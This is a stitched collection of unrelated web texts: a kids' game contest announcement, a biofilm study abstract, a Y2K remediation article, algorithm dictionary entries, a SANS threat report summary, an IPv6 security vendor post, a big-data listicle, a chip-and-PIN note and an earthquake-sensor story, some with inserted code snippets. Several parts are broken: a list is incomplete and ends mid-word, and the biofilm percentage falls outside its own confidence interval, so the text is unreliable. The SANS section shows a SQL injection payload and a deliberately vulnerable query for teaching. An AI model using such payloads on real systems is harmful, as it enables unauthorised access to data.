Microsoft also announced the Kodu Cup, a U.S. game competition for kids from 9 to 17 years old. Contestants are to design their own video game for the PC using Kodu. Winners will have the chance to win $5,000 for themselves as well as $5,000 for their school, some great technology, and a trip to the worldwide finals of Microsoft's Imagine Cup competition. Games are a great way to engage students, and there is a lot of momentum behind educational video games in the classroom and beyond, Microsoft officials said.
"We're also releasing a classroom kit for teachers to easily implement Kodu into their curricula," Cheng said. "Hopefully, Kodu can play a role in helping children learn and encouraging more children to become future video game designers, engineers or scientists."
As of March 16, kids can enter the competition. Interested parties can read the official rules and learn more at http://koducup.us.
"Kids have a natural passion for video games and video game design," said Michael H. Levine, Ph.D., executive director of the Joan Ganz Cooney Center at Sesame Workshop, in a statement. "Microsoft's Kodu Cup is a great way to harness that passion and apply it in a way that helps improve academic achievement, skills and interest in the careers of the future, which are going to fuel our country."
"Our research has shown that Kodu Game Lab appeals equally to girls and boys and helps promote creativity, self-confidence, critical thinking and technology skills," Microsoft's Cheng said in a statement. "Kids don't feel like they're programming so much as playing, even though they're creating sophisticated worlds, characters and storylines."
Mahapatra A., Bhatt M., Jena S., and 2 more authors, SCB Medical College, Bhubaneswar
Journal of Clinical and Diagnostic Research | Year: 2015
Context: A biofilm is a layer of microorganisms contained in a matrix (slime layer), which forms on surfaces in contact with water. Their presence in drinking water pipe networks can be responsible for a wide range of water quality and operational problems. Aim: To identify the bacterial isolates, obtained from water pipelines of kitchens, to evaluate the water quality & to study the biofilm producing capacity of the bacterial isolates from various sources. Settings and Design: A prospective study using water samples from aqua guard & pipelines to kitchens of S.C.B Medical College hostels. Materials and Methods: Standard biochemical procedures for bacterial identification, multiple tube culture & MPN count to evaluate water quality & tissue culture plate (TCP) method for biofilm detection was followed. Statistical analysis: STATA software version 9.2 from STATA Corporation, College station road, 90 Houston, Texas was used for statistical analysis. Results: One hundred eighty seven isolates were obtained from 45 water samples cultured. The isolates were Acinetobacter spp. (44), Pseudomonas spp.(41), Klebsiella spp.(36) & others. Biofilm was detected in (37) 19.78% of the isolates (95% CI 30.08% -43.92%) including Acinetobacter spp.-10, Klebsiella spp. - 9, Pseudomonas spp. - 9, & others, majority (34) of which were from kitchen pipelines. Conclusion: Water from pipeline sources was unsatisfactory for consumption as the MPN counts were > 10. Most of the biofilm producers were gram negative bacilli & Pseudomonas & Acinetobacter spp. were strong (4+) biofilm producers. © 2015, Journal of Clinical and Diagnostic Research. All rights reserved. 
"Warning: This year might bite! Armed and considered extremely dangerous to automated systems!" Perhaps we should put up wanted posters in all public places or place a label on every calendar. Some call it the year-2000 problem, others the Millennium Bug, and still others the Y2K problem; but whatever you call it, call it a serious problem. Of course, there are many people who, for whatever reason, don't believe it, are still hoping for a "silver bullet," or are just plain mad at the whole thing.
What is the year-2000 computer glitch? Simply stated, programmers in the past used two digits, instead of four, to describe the year. Thus 1997 became 97, and 2001 would become 01. If someone says to you "I was born in 45," you would quickly assume they were born in 1945. Your mind makes a logical conclusion that the person could not still be alive if they were born in 1845 and obviously could not have been born in 2045, so they must have been born in 1945. Your mind used deductive reasoning -- one of the many affable traits of human beings.
Unless a programmer has instructed a computer, through a program, to make the same sort of deduction, the computer will not make any assumption at all. For instance, assume for a moment the year is 2000 and a computer program is to calculate a person's age but is given only the last two digits of a person's birth year (say 45). The computer will perform as it has been instructed, i.e. it will subtract the birth year from the current year to calculate the age. In this case it will calculate current year - birth year = computer age, e.g. 00 - 45 = -45. Of course, the correct answer is really 55. But in this simple, but realistic, example the computer did not "blow up" or stop working, or anything obvious -- it just gave the wrong answer.
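The arithmetic failure described above is easy to reproduce. A minimal illustrative sketch of the faulty two-digit calculation alongside the four-digit fix:

```python
def age_two_digit(current_yy, birth_yy):
    # Faulty legacy logic: subtracts two-digit years directly.
    return current_yy - birth_yy

def age_four_digit(current_year, birth_year):
    # Corrected logic using full four-digit years.
    return current_year - birth_year

# In the year 2000, for a person born in 1945:
assert age_two_digit(0, 45) == -45       # wrong answer, but no crash
assert age_four_digit(2000, 1945) == 55  # correct
```

Note that the buggy version does not raise an error; it silently produces a wrong answer, which is exactly what makes the problem insidious.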
Problem Occurs at Three Levels
This problem can occur at three levels. The first is the most obvious: in traditional "mainframe" computers. These systems are dominated by older computer languages such as COBOL, which encouraged significant independent programming. While these programs served their entities extremely well and have paid for themselves many times over, they generally were not written for years beyond 1999.
The second place to look for this problem is in embedded process controllers. "What's that?" you ask. It is any automated process controlled by a computer chip, such as personal computers, security elevators and doors, telephone switches, traffic lights and electric utility sub-stations. This problem is truly a "Year 2000 Bug." When the microchip was invented, the BIOS (Basic Input Output System) of these chips was designed only to have a two-digit year. A personal computer containing a faulty chip might change its internal date to Jan. 1, 1980, when restarted after Dec. 31, 1999. By the way, Jan. 1, 2000, is a Saturday but Jan. 1, 1980, was a Tuesday, a situation that may cause business doors to be unlocked when they should be automatically closed.
The third place to find the year-2000 problem is, unfortunately, largely overlooked. The third problem is hidden in data. For instance, how will spreadsheets be interpreted after Jan. 1, 2000, when staff has entered only the last two digits of the year for the last several years? The answer depends on the spreadsheet being used. If Excel or Lotus 1-2-3 is being used, it also depends on programmers in Utah (where Lotus 1-2-3 is manufactured) or Washington (where Excel is manufactured). These two popular spreadsheets provide different answers and very little documentation. As long as customers of these systems enter data in its abbreviated two-digit year form, there will be a year-2000 problem when those dates are compared to other dates after the year 2000.
How is the problem fixed? Technically the year-2000 problem is not very challenging. Even novice COBOL programmers can find and correct the use of two-digit year identifiers. Several techniques are available to help embedded process controllers. What makes the problem difficult is two related issues. One, many different areas must be examined and fixed. A medium-size local government may have millions of lines of code -- nearly any of which could contain tests that use dates. Invalid date comparisons can occur in computer programs, training, embedded processors, and in existing data. This becomes a massive inventory, remediation and testing campaign. In short, it requires an extensive management effort to prioritize and execute a plan that will avert problems in time.
And time (or lack thereof) is the second complicating issue. Very little time remains before the year 2000. This is one deadline that will not slip or be delayed. There is no reprieve -- no extension. Worse, even now the problem is manifesting itself in systems that project a result into the future.
To make wise use of the little time that remains, a local government must do a comprehensive inventory of all its automated applications -- mainframe, enterprise servers, telephone switches, etc. Governments must determine which applications will be compliant and which ones will not be using thorough testing techniques. Governments must prioritize the results and find out what remediation steps are required, so plans can be constructed to fix the problem. Finally, local governments must determine which applications can be fixed on time. Contingency plans will be very important for those applications that can't be fixed in time.
Only a few ways exist to fix the year-2000 problem. There appear to be only five recognized ways to fix programs and data affected by the use of two digits to represent the year. The International Standard (ISO 8601), adopted by ANSI (American National Standards Institute), requires that all dates be expressed in yyyymmdd format (sometimes dashes are included separating the year-month-day fields) using leading zeroes where appropriate. Thus Jan. 1, 2000, would be 20000101 and Dec. 31, 1999, would be 19991231. The ISO 8601 standard is the most intuitive and easiest way to express dates. But it has its drawbacks.
The second and third techniques are called windowing -- fixed and sliding. The idea behind both techniques is to choose, based upon the application, a 100-year segment of time. In a fixed window system, all two-digit years are compared to the selected 100-year segment. For instance, assume a file contained the date 12/25/45 and the 100-year segment is 1940 to 2040. The year would be compared to 40. Since 45 is greater than 40 a 19 is applied for the century. If the two-digit year were less than 40, a 20 would be applied for the century. In the terminology of "windowing" the years selected become "pivot" years -- meaning the century is pivoted based upon the "pivot" years comparison.
Obviously, over time, the fixed window technique becomes obsolete. Thus the concept of a "sliding window" was developed. It is similar to the "fixed" concept, except the pivot years are based upon the current date. So instead of a fixed 100-year period, as in the "fixed window" technique, a "sliding" 100-year period is selected. For example, instead of selecting 1940 and 2040, the sliding technique might use 48 years previous and 52 years from now as pivot points. The same logic is applied as in the fixed window technique, e.g. if the two-digit year is greater than the first pivot point (current year minus first pivot point) the century 19 is applied but if it is less than the second pivot point (current year plus second pivot point) then the century 20 would be assumed. One of the advantages of using a sliding window approach is different pivot points can be selected for different applications, but, as in the fixed window technique, the pivot points indicate a specific 100-year period.
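The two windowing schemes can be sketched in a few lines of code. The pivot values below (40 for the fixed window, 55 years back for the sliding window) are illustrative assumptions, not values prescribed by the article:

```python
import datetime

def expand_fixed(yy, pivot=40):
    """Fixed window: two-digit years >= pivot map to 19xx, the rest to 20xx.
    With pivot=40 the window covers 1940-2039."""
    return 1900 + yy if yy >= pivot else 2000 + yy

def expand_sliding(yy, back=55, today=None):
    """Sliding window: interpret yy within the 100-year span that starts
    `back` years before the current year."""
    current = (today or datetime.date.today()).year
    start = current - back               # earliest year in the window
    century = start - start % 100
    candidate = century + yy
    if candidate < start:                # fell before the window: next century
        candidate += 100
    return candidate

assert expand_fixed(45) == 1945
assert expand_fixed(25) == 2025
# As of 1999, a window reaching 55 years back spans 1944-2043:
assert expand_sliding(45, today=datetime.date(1999, 6, 1)) == 1945
assert expand_sliding(25, today=datetime.date(1999, 6, 1)) == 2025
```

The advantage of the sliding form is visible in the signature: the window is recomputed from today's date, so the code never goes stale the way a fixed pivot does.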
The fourth technique relies on computer math and often is called "encryption." Without trying to describe why, it is well-understood the American date, 12/31/99, can be stored in six numeric computer bytes and with a little bit of rearranging can be used for comparing two dates, i.e. rearrange to 991231. But after extending the date (to include a four-digit year), a programmer can store 19991231 in five computer bytes simply by making the field binary. Thus a programmer can store the complete date, using one byte less, through the use of a computer mathematical "trick."
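The space saving is easy to verify. Eight ASCII digits occupy eight bytes, while the same value as a plain binary integer fits in four; the article's five-byte figure likely reflects COBOL packed decimal (one nibble per digit plus a sign nibble), which is an assumption on my part. A quick sketch:

```python
import struct

date_text = b"19991231"                    # eight ASCII bytes
date_binary = struct.pack(">I", 19991231)  # unsigned 32-bit big-endian integer

assert len(date_text) == 8
assert len(date_binary) == 4
# The full four-digit date round-trips losslessly:
assert struct.unpack(">I", date_binary)[0] == 19991231
```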
The final technique relies on the fact that the Gregorian calendar repeats itself every 28 years: 28 years earlier, the same date fell on the same day of the week. It is called the encapsulation method. This technique is hotly debated but is probably a very useful concept for some embedded process controllers where the actual year is not important. But it is not a recommended technique for systems with complex programming.
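The 28-year cycle is easy to check with a date library. It holds across 2000 because 2000 is a leap year, so no skipped leap day interrupts the pattern:

```python
import datetime

# Same calendar date, 28 years apart, falls on the same weekday.
for year, month, day in [(2000, 1, 1), (2000, 2, 29), (1999, 12, 31)]:
    original = datetime.date(year, month, day)
    shifted = datetime.date(year - 28, month, day)
    assert original.weekday() == shifted.weekday()

# Matching the article: Jan. 1, 2000, is a Saturday, as was Jan. 1, 1972.
assert datetime.date(2000, 1, 1).strftime("%A") == "Saturday"
assert datetime.date(1972, 1, 1).strftime("%A") == "Saturday"
```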
The Good, the Bad and the Ugly
No, we are not talking about another spaghetti western. What techniques make the most sense? ISO 8601 makes the most sense, because it is the most intuitive. It is also the most expensive technique available. Converting to ISO 8601 means three things. One, all significant date fields in any existing databases (active, archived and security files) must be converted. Two, every program in an application must be checked for significant date usage and converted. And three, the entire application has to be converted from its previous form to the new form all at once. However, most standard setting bodies have looked to the ISO 8601 technique as the best technique.
Fixed windowing has the obvious drawback that soon it would become obsolete. As the years advance, the future-year pivot point draws nearer, and the bottom pivot point draws farther away, therefore less useful to the application. Fixed windowing has a very limited use, if at all. The advantage in using the sliding window technique is that data need not be converted and, for most applications, production programs can be gradually converted. The decision to use this technique probably rests on the amount of time remaining to make year-2000 fixes and the amount of money available. However, if the 100-year period is well selected, this technique may be permanent and cheaper than ISO 8601.
Like the ISO 8601 format, above, the encryption method will require changes to the data and programs and might require an "all-at-once" conversion. It does avoid having to buy additional permanent memory and it is easily explained to the IT professional. The encapsulation method is, perhaps, useful only in embedded process controllers in which the actual year is not important, but the day of the week is very important. For such specialized applications its use might save considerable time and effort.
What if we don't finish? After a thorough inventory, and before remediation is in full swing, it is crucial, though difficult, to determine if the government's efforts will result in compliant systems. And if not, what will your city or county do? If your city's unable to bill for water and sewer services until June 2000, what contingency plan will you have in place?
"There will not be enough time and/or money to fix everything. As triage principles are applied, some low-priority systems will not be fixed at all. Similarly, some medium-priority systems may not be thoroughly tested. Finally, some mission-critical systems may still have errors, even after thorough testing, just due to complexities and oversights" (see for a very technical presentation of Y2K Contingency Planning Requirements by MITRE Corp.). Both time and available resources have diminished. If a local government is not well into its remediation efforts the time this article [is published], then action steps must include development of a contingency plan.
After a thorough and complete inventory of potentially affected systems, rigorous prioritization of those systems must be accomplished. This must, of necessity, involve an evaluation of essential services provided by the local government. It is essential that top management performs or at least directs this effort.
After all potentially affected systems have been prioritized and remediation efforts are under way, estimates to fix crucial applications may exceed the available time. In those cases, contingency plans must be developed and the prioritized list reordered.
How bad will it really be? Many predict doom-and-gloom scenarios. They argue that financial institutions won't function, electric utility companies will lose their electric grids, and governments will fail. We know that many local governments have made corrective actions and that many more are on schedule to complete remediation. Large numbers of financial institutions have poured millions of dollars into this problem. But a question remains: how many entities have done nothing? Unfortunately, the entities that have done the most work addressing this problem are the most concerned. In this world of interconnected automated processes, some critical mass of compliant entities is necessary to avoid a large-scale problem.
Be a good scout! "Be prepared" is the official Scout motto. There is no better credo for local government anywhere. The most effective advice we can offer local governments is to start today, if you have not already, and urge your local businesses to do the same.
Copyright 1998, Public Technology Inc.
November Table of Contents
By Michael Humphrey
Director of telecommunications and information, Public Technology Inc.
Reprinted by permission of Public Technology Inc., the nonprofit technology organization for local governments. PTI is the technology arm of the National League of Cities, the International City/County Management Association, and the National Association of Counties.
Definition: A theoretical measure of the execution of an algorithm, usually the time or memory needed, given the problem size n, which is usually the number of items. Informally, saying some equation f(n) = O(g(n)) means it is less than some constant multiple of g(n). The notation is read, "f of n is big oh of g of n".
Formal Definition: f(n) = O(g(n)) means there are positive constants c and k, such that 0 ≤ f(n) ≤ cg(n) for all n ≥ k. The values of c and k must be fixed for the function f and must not depend on n.
Also known as O.
See also Ω(n), ω(n), Θ(n), ~, little-o notation, asymptotic upper bound, asymptotically tight bound, NP, complexity, model of computation.
Note: As an example, n² + 3n + 4 is O(n²), since n² + 3n + 4 < 2n² for all n > 10 (and many smaller values of n). Strictly speaking, 3n + 4 is O(n²), too, but big-O notation is often misused to mean "equal to" rather than "less than". The notion of "equal to" is expressed by Θ(n).
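The witness constants in the note can be checked mechanically over a finite range; a small illustrative sketch using c = 2 and k = 10 from the example above:

```python
def f(n):
    return n * n + 3 * n + 4

def g(n):
    return n * n

c, k = 2, 10

# 0 <= f(n) <= c*g(n) for all n >= k (checked here over a finite range).
assert all(0 <= f(n) <= c * g(n) for n in range(k, 10_000))

# The bound genuinely needs the threshold k: it fails for small n.
assert f(1) > c * g(1)
```

Of course, a finite check is evidence, not proof; the inequality n² + 3n + 4 ≤ 2n² for n ≥ 10 follows algebraically from 3n + 4 ≤ n² there.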
The importance of this measure can be seen in trying to decide whether an algorithm is adequate, but may just need a better implementation, or the algorithm will always be too slow on a big enough input. For instance, quicksort, which is O(n log n) on average, running on a small desktop computer can beat bubble sort, which is O(n²), running on a supercomputer if there are a lot of numbers to sort. To sort 1,000,000 numbers, the quicksort takes 20,000,000 steps on average, while the bubble sort takes 1,000,000,000,000 steps! See Jon Bentley, Programming Pearls: Algorithm Design Techniques, CACM, 27(9):868, September 1984 for an example of a microcomputer running BASIC beating a supercomputer running FORTRAN.
Any measure of execution must implicitly or explicitly refer to some computation model. Usually this is some notion of the limiting factor. For one problem or machine, the number of floating point multiplications may be the limiting factor, while for another, it may be the number of messages passed across a network. Other measures that may be important are compares, item moves, disk accesses, memory used, or elapsed ("wall clock") time.
[Knuth97, 1:107], [HS83, page 31], and [Stand98, page 466] use |f(n)| ≤ c|g(n)|. In computational complexity theory "only positive functions are considered, so the absolute value bars may be left out." (Wikipedia, "Big O notation"). This definition after [CLR90, page 26].
Strictly, the character is the upper-case Greek letter Omicron, not the letter O, but who can tell the difference?
Wikipedia Big O notation. Big O is a Landau Symbol.
Donald E. Knuth, Big Omicron and Big Omega and Big Theta, SIGACT News, 8(2):18-24, April-June 1976.
If you have suggestions, corrections, or comments, please get in touch with Paul Black.
Entry modified 31 August 2012.
HTML page formatted Mon Feb 2 13:10:39 2015.
Cite this as:
Paul E. Black, "big-O notation", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 31 August 2012. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/bigOnotation.html | <urn:uuid:13e02966-ba07-4ef8-bc44-932ab402b7c6> | CC-MAIN-2017-04 | http://www.darkridge.com/~jpr5/mirror/dads/HTML/bigOnotation.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00308-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.860962 | 837 | 4.03125 | 4 |
Definition: A dictionary in which keys are mapped to array positions by hash functions. Having the keys of more than one item map to the same position is called a collision. There are many collision resolution schemes, but they may be divided into open addressing, chaining, and keeping one special overflow area. Perfect hashing avoids collisions, but may be time-consuming to create.
Also known as scatter storage.
Specialization (... is a kind of me.)
perfect hashing, dynamic hashing, 2-left hashing, cuckoo hashing, 2-choice hashing, hashbelt.
Aggregate parent (I am a part of or used in ...)
Aggregate child (... is a part of or used in me.)
load factor, hash table delete, collision resolution: coalesced chaining, linear probing, double hashing, quadratic probing, uniform hashing, simple uniform hashing, separate chaining, direct chaining, clustering.
See also Bloom filter, huge sparse array.
Note: Complexity depends on the hash function and collision resolution scheme, but may be constant (Θ(1)) if the table is big enough or grows. Some open addressing schemes suffer from clustering more than others.
The table may be an array of buckets, to handle some numbers of collisions easily, but some provision must still be made for bucket overflow.
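A minimal separate-chaining table (an illustrative sketch, not tied to any particular implementation; the bucket count is deliberately tiny to force collisions) shows how hash functions map keys to array positions and how colliding keys share a bucket:

```python
class ChainedHashTable:
    """Dictionary backed by an array of buckets; collisions are chained."""

    def __init__(self, size=8):
        self.buckets = [[] for _ in range(size)]

    def _index(self, key):
        # The hash function maps a key to an array position.
        return hash(key) % len(self.buckets)

    def put(self, key, value):
        bucket = self.buckets[self._index(key)]
        for i, (k, _) in enumerate(bucket):
            if k == key:                     # key already present: overwrite
                bucket[i] = (key, value)
                return
        bucket.append((key, value))          # collision: append to the chain

    def get(self, key, default=None):
        for k, v in self.buckets[self._index(key)]:
            if k == key:
                return v
        return default

    def delete(self, key):
        idx = self._index(key)
        self.buckets[idx] = [(k, v) for k, v in self.buckets[idx] if k != key]

table = ChainedHashTable(size=2)             # two buckets guarantee collisions
table.put("apple", 1)
table.put("pear", 2)
table.put("plum", 3)
assert table.get("pear") == 2
table.delete("pear")
assert table.get("pear") is None
```

With only two buckets, at least two of the three keys must share a chain; a production table would also track the load factor and grow the bucket array to keep chains short and lookups near constant time.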
"The idea of hashing appears to have been originated by H. P. Luhn, who wrote an internal IBM memorandum in January 1953" [Knuth98, 3:547, Sect. 6.4]. He continues with more than a page of history.
If you have suggestions, corrections, or comments, please get in touch with Paul Black.
Entry modified 16 November 2009.
HTML page formatted Mon Feb 2 13:10:39 2015.
Cite this as:
Paul E. Black, "hash table", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 16 November 2009. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/hashtab.html
Top Cyber Security Risks Revealed

A report issued by The SANS Institute finds enterprise security efforts focused on fixing low-priority flaws at the expense of serious application vulnerabilities.
More than half of all cyber attacks hit two key areas: unpatched client-side software and Web applications.
These findings, along with several others, come from a report titled "The Top Cyber Security Risks," which was compiled by The SANS Institute. The report is based on intrusion data from 6000 companies and government agencies using TippingPoint security hardware and on malware data from millions of PCs monitored by Qualys.
The report, to be released on Tuesday, observes that major organizations typically take twice as long to patch application vulnerabilities as operating system vulnerabilities, despite the lower number of attacks on operating system vulnerabilities.
"In other words the highest priority risk is getting less attention than the lower priority risk," the report states.
More than 60% of attack attempts on the Internet target Web applications, the report finds. When successful, subsequent attempts to infect visitors to the breached site become much easier because the users tend to trust the sites they're visiting and often willingly download files from trusted sites, oblivious to the danger of hidden malicious payloads.
More than 80% of the software vulnerabilities being found by security researchers involve Web application flaws that allow attack techniques like SQL injection or Cross-Site Scripting, the report says.
Despite ongoing reports about Web flaws of this sort, the report says, most Web site owners fail to scan effectively for these common vulnerabilities.
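To see why these flaws are so common, and why parameterized queries prevent them, here is a small illustrative sketch using Python's built-in sqlite3 module (the table, function names and query are invented for this example):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin')")

def find_user_unsafe(name):
    # VULNERABLE: attacker-controlled input is spliced into the SQL text
    query = "SELECT role FROM users WHERE name = '%s'" % name
    return conn.execute(query).fetchall()

def find_user_safe(name):
    # Parameterized query: the driver treats the input strictly as data
    return conn.execute(
        "SELECT role FROM users WHERE name = ?", (name,)).fetchall()

# A classic injection payload turns the WHERE clause into a tautology
payload = "x' OR '1'='1"
```

With the payload above, `find_user_unsafe` returns every row in the table, while `find_user_safe` correctly finds nothing.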
The report also notes that zero-day vulnerabilities -- flaws disclosed prior to the availability of a fix -- are becoming more common. "Worldwide there has been a significant increase over the past three years in the number of people discovering zero-day vulnerabilities, as measured by multiple independent teams discovering the same vulnerabilities at different times," the report says. "Some vulnerabilities have remained unpatched for as long as two years."
A shortage of skilled security researchers in both the security industry and in government organizations has made it harder for organizations to defend against these attacks. "So long as that shortage exists, the defenders will be at a significant disadvantage in protecting their systems against zero-day attacks," the report says.
At the same time, the number of people with security skills -- for good or ill -- worldwide is increasing. As evidence of that, the report cites MS08-031 (Microsoft Internet Explorer DOM Object Heap Overflow Vulnerability), which was found independently by three researchers using different approaches.
"The implication of increasing duplicate discoveries is fairly alarming, in that the main mitigation for vulnerabilities of this type is patching, which is an invalid strategy for protecting against zero-day exploits," the report says.
InformationWeek has published an in-depth report on managing risk. Download the report here (registration required).
Is IPv6 infiltrating your network? Probably. Here’s what you need to know.
By Mark Mullins
The explosive growth of Internet-enabled devices is rapidly diminishing the supply of IPv4 addresses. In addition to computers, servers, routers, etc., addresses are being allocated to the “Internet of things,” including cameras, HVAC controls, alarm systems and a burgeoning constellation of connected sensors. As a result, in 2011 the Asia-Pacific Network Information Centre began rationing its final /8 block of IPv4 addresses. Other regional registries will likely soon follow suit.
As if that weren’t enough, the widespread use of IPv4 network address translation (NAT) – which maps multiple private addresses to a single public IPv4 address – could ultimately hinder the use of IP-based communications services like VoIP and even degrade the performance of Internet backbone routers as they struggle to cope with increasingly massive routing tables.
So it’s not surprising that most modern operating systems now support dual-stack IPv4 and IPv6 architectures; Windows 8, Windows Vista and Mac OS X 10.3 and later have IPv6 enabled by default. IPv6 devices will automatically configure a link-local address for each of their interfaces and use router discovery to determine the addresses of IPv6 routers, access configuration parameters and global address prefixes. Even without a stateful configuration protocol such as DHCPv6, an IPv6-capable device can configure an IPv6 address for each of its interfaces.
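As a rough illustration of that autoconfiguration step, the sketch below derives the EUI-64-based IPv6 link-local address a host would form from an interface's MAC address (the function name is ours; this is the standard flip-the-universal/local-bit, insert-ff:fe construction):

```python
def mac_to_link_local(mac: str) -> str:
    """Derive the EUI-64-based IPv6 link-local address for a MAC address."""
    b = [int(octet, 16) for octet in mac.split(":")]
    b[0] ^= 0x02                             # flip the universal/local bit
    eui64 = b[:3] + [0xFF, 0xFE] + b[3:]     # insert ff:fe in the middle
    # Pack the 8 bytes into four 16-bit groups, dropping leading zeros
    groups = ["%x" % ((eui64[i] << 8) | eui64[i + 1]) for i in range(0, 8, 2)]
    return "fe80::" + ":".join(groups)
```

For example, a host with MAC address aa:bb:cc:dd:ee:ff would configure fe80::a8bb:ccff:fedd:eeff on that link; note that privacy addressing, discussed below, deliberately avoids this traceable construction.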
While you may not be routing IPv6 traffic on your network, you still need to be concerned about IPv6-enabled end devices. Tunneling (which is supported in every OS and automatically enabled with the IPv6 stack) allows IPv6 transport over IPv4 connections and vice versa. IPv6 transport can be encrypted and used with anonymous (privacy) addressing, which does not use the EUI-64 constructed interface identifier that would allow you to trace it back to the MAC address of the host. There are a number of tunneling mechanisms (see NETSCOUT’s IPv6 white paper for a more complete discussion of them). The bottom line is that if you have a local tunnel within your intranet, you needn’t worry. But if you have a local device with a tunnel endpoint outside your network, it could allow access to your internal network that would likely be unprotected by firewalls or intrusion detection devices.
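One cheap check you can run against discovered addresses is a prefix test for the common automatic-tunnel mechanisms. This sketch uses Python's standard ipaddress module; the prefix table is our own shorthand covering only 6to4 and Teredo, two of the well-known mechanisms:

```python
import ipaddress

# Well-known automatic-tunnel prefixes (illustrative subset)
TUNNEL_PREFIXES = {
    "6to4":   ipaddress.ip_network("2002::/16"),
    "Teredo": ipaddress.ip_network("2001::/32"),
}

def tunnel_type(addr: str):
    """Return the tunnel mechanism an address's prefix suggests, or None."""
    ip = ipaddress.ip_address(addr)
    for name, net in TUNNEL_PREFIXES.items():
        if ip in net:
            return name
    return None
```

An address matching one of these prefixes points at a host with a tunnel endpoint, possibly outside your network, whose traffic may bypass IPv4-only firewall rules.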
There are other potential vulnerabilities inherent to IPv6, including:
- Rogue router advertisements: Non-routers may advertise subnet addresses that should not exist on your network. This could simply be the result of IPv6 router or host configuration errors or – more concerning – an indication of malicious activity. By sending fake router advertisements, an attacker could fool other hosts on the subnet into sending it traffic (a “man-in-the-middle” attack). DHCPv6 spoofing works in a similar way. So it’s important to sniff out devices offering IPv6 stateful addresses.
- Open ports: Since IPv6 is less mature than IPv4, operating systems tend to leave more IPv6 ports open. It’s good practice to perform an IPv6 port scan to find open ports. Bear in mind that IPsec support is standard in any IPv6 stack, enabling devices to more easily encrypt end-to-end traffic while preventing firewalls from detecting the packet content.
While using malicious traffic to attack a network isn’t something new, IPv6-enabled devices may make it possible for an attacker to break into your network and extract data undetected using traditional methods through IPv6.
There’s an OptiView XG for that
So, now that you’re sufficiently terrified, what can you do to minimize the risks of IPv6 devices on your network? Fortunately, we’ve got you covered.
NETSCOUT’s OptiView XG portable network analysis tablet has the built-in capability to both passively and actively discover IPv6 devices and services. While other network analysis devices offer only passive discovery by monitoring IPv6 traffic and capturing IP and MAC addresses, they can’t categorize the devices based on the identified protocols. The OptiView XG, by contrast, transmits router solicitation requests in order to identify all IPv6 prefixes for the subnet and transmits neighbor solicitations to provide information on other IPv6 devices. It also provides visibility into router IPv6 Net-to-Media tables (the equivalent of an IPv4 ARP table) to discover link-local addresses off the attached subnet. And it can access Cisco router prefix tables that provide information on other subnets.
Of course, the OptiView XG also provides many other advanced capabilities to detect and diagnose potential security problems, such as downloads of restricted files and documents, the use of prohibited applications and risky P2P traffic. It can also help to identify and locate rogue or unsecured devices. Click here to see all that the OptiView XG offers.
Ready or not, IPv6 is coming
While it’s hard to say exactly when IPv6 will supplant IPv4, it’s only a matter of time. But right now, you need to be aware of the IPv6-enabled devices on your network and the potential security risks they pose. Addressing those risks today will help you be ready when it’s time for the inevitable migration of your entire network to IPv6.
Related IT networking resources
Continue to our The Decoder Blog for more on network troubleshooting
5 Things to Know About Big Data in Motion
By Mike Ebbers
As world activities become more integrated, the rate of our data growth has been increasing exponentially. This data explosion is making current data management methods inadequate. People are using the term big data to describe this latest industry trend. IBM is preparing the next generation of technology to meet these data management challenges.
Here are 5 things to know about big data in motion:
1. Big data is divided into “data in motion” and “data at rest.”
Data in motion is the process of analyzing data on the fly without storing it. Some big data sources feed data unceasingly in real time. Systems to analyze this data include IBM Streams, which we cover in this blog. Data at rest is a snapshot of the information that is collected and stored, ready to be analyzed for decision-making. We cover this in another blog.
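The core idea, analyzing each record as it arrives while keeping only a bounded window in memory, can be sketched in a few lines of plain Python. This is a generic illustration of data in motion, not the IBM Streams API (which has its own Streams Processing Language):

```python
from collections import deque

def rolling_mean(stream, window=3):
    """Emit a running average over the last `window` values of a live stream."""
    buf = deque(maxlen=window)       # old readings fall off automatically
    for value in stream:             # never materializes the whole stream
        buf.append(value)
        yield sum(buf) / len(buf)
```

Because it is a generator over an iterable, the same code works whether `stream` is a short list or an unbounded feed of sensor readings: nothing is stored beyond the current window.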
2. Big data has several characteristics that all begin with V: volume, velocity, variety and veracity.
3. IBM Streams allows for instantaneous processing of data in motion.
Not only is the actual data available right from the sources, but those sources are also interconnected in such a way that we can acquire that data as it is being generated. The acquisition of data is no longer limited to the realm of passive observation and manual recording. Where we once assumed, estimated, and predicted, we now have the ability to know and take action.
4. IBM Streams is installed on nearly every continent in the world.
Here are just a few of the locations of IBM Streams, and more are being added each year.
5. IBM Streams is inexpensive to install.
Over the past several years, hundreds of applications have been developed using InfoSphere Streams. These include such areas as:
For more information, read all about it in IBM’s Redbooks publication: Addr
In yesterday’s post we explained what Chip and PIN cards are and how they’re catching on worldwide. Today I’d like to go over the benefits of Chip and PIN so you can see why so many countries are adopting the technology. Chip and PIN cards provide benefits to cardholders, merchants and banks, including:
Safety - Chip and PIN cards are more secure than traditional magnetic stripe cards: it is exceptionally difficult to copy the information stored on the chip, and the unique PIN prevents a lost or stolen card from being used by someone else.
Faster Payments - with Chip and PIN, transactions are faster and there is no need to check a signature.
Fewer Disputes - Chip and PIN reduces fraudulent and disputed payments.
Customer Confidence - Chip cards are harder to counterfeit, and PIN numbers help prevent fraud involving lost and stolen cards.
Chip-enabled technology has the ability to eliminate the need for tethered devices to process payments in the field, making it a technology to keep an eye on for any business with a mobile workforce.
In Chile, Andres Sepulveda never saw the magnitude 8.8 earthquake coming in February, but his laptop captured the data during the catastrophe.
As an assistant professor at the University of Concepción, Sepulveda studies oceanography. But in January, just before he left for a vacation, he installed on his five-year-old laptop a USB motion sensor device. It’s part of an expanding seismic network, which has the potential to send warnings, save lives and bolster public safety efforts when an earthquake strikes. Called the Quake-Catcher Network (QCN), the project uses inexpensive motion sensors in computers to collect earthquake data in real time.
“I had this instrument as part of scientific curiosity,” Sepulveda said. “Chile is a seismic country so I had the idea it could get something while I was away. It was just a test, so I left it on top of a box on the floor of my office. And then the earthquake happened.”
